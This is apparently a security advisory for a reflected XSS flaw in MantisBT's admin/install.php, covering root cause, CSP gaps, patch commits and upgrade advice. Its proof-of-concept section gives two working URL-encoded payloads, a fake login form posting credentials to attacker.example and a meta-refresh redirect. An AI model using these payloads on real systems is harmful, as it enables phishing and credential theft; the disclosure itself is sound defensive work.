CVE-2026-52847: MantisBT Reflected XSS in admin/install.php
MantisBT's installer page echoes attacker-controlled form parameters directly into HTML without escaping, letting anyone craft a URL that injects fake login forms or silent redirects into the real adm
The problem
In MantisBT 2.28.3 and earlier, the installer script `/admin/install.php` accepts six user-supplied GET/POST parameters and passes them through `print_test_result()` into the response HTML without any output encoding.
No authentication is required to reach this page. MantisBT's CSP (`script-src 'self'`) blocks inline `<script>` execution, but the missing `form-action` directive leaves credential-phishing via injected `<form>` elements and silent `<meta>` open redirects fully exploitable.
Proof of concept
A working proof-of-concept for CVE-2026-52847 in mantisbt/mantisbt, with the exact payload below.
# Credential-phishing via <form> injection (no JS needed, bypasses CSP)
# Parameter: hostname (any of the six reflected params works the same way)
GET /admin/install.php?hostname=%22%3E%3C/input%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cform+action%3D%22https%3A//attacker.example/harvest%22+method%3D%22POST%22%3E%3Ch2%3ESession+Expired+%E2%80%94+Re-authenticate%3C/h2%3E%3Cinput+name%3D%22username%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22password%22+placeholder%3D%22Password%22%3E%3Cbutton%3ELogin%3C/button%3E%3C/form%3E HTTP/1.1
Host: mantisbt.example.com
# Open-redirect variant via <meta> tag injection
GET /admin/install.php?db_username=%22%3E%3Cmeta+http-equiv%3D%22refresh%22+content%3D%220%3Burl%3Dhttps%3A//attacker.example/%22%3E HTTP/1.1
Host: mantisbt.example.comThe root cause is CWE-79: `print_test_result()` calls `echo` on raw request parameters (`$f_hostname`, `$f_db_username`, `$f_db_password`, `$f_database_name`, `$f_admin_username`, `$f_db_type`) without passing them through `string_display_line()` or any equivalent HTML-encoding function first.
The CSP's `script-src 'self'` prevents classic `<script>alert()` payloads, but because there is no `form-action` directive, an injected `<form action="https://attacker.example">` submits credentials cross-origin freely. A `<meta http-equiv="refresh">` redirect requires zero JavaScript and is equally unaffected by `script-src`.
Patch commits `0f32cea` and `f2191a0` wrap every reflected parameter in `string_display_line()` (which calls `htmlspecialchars()`) before output, and the second commit adds a `form-action 'self'` directive to the CSP header on `install.php`.
The fix
Upgrade to MantisBT 2.28.4. If an immediate upgrade is not possible, remove or restrict access to the `/admin` directory entirely, as recommended in the MantisBT Admin Guide. There is no safe way to leave a public-facing `install.php` on a production server.
Reported by McCaulay Hudson (@_McCaulay) of watchTowr.
Related research
- highCVE-2026-62944CVE-2026-62944: MantisBT Stored XSS via Attachment Filename in HTML Export
- criticalCVE-2026-52881CVE-2026-52881: MantisBT Reflected XSS in admin/install.php
- highCVE-2026-49273CVE-2026-49273: MantisBT Remote Code Execution via eval() Class Hoisting in adm_config_set.php
- highCVE-2026-47142CVE-2026-47142: MantisBT SQL Injection via history_order Configuration Value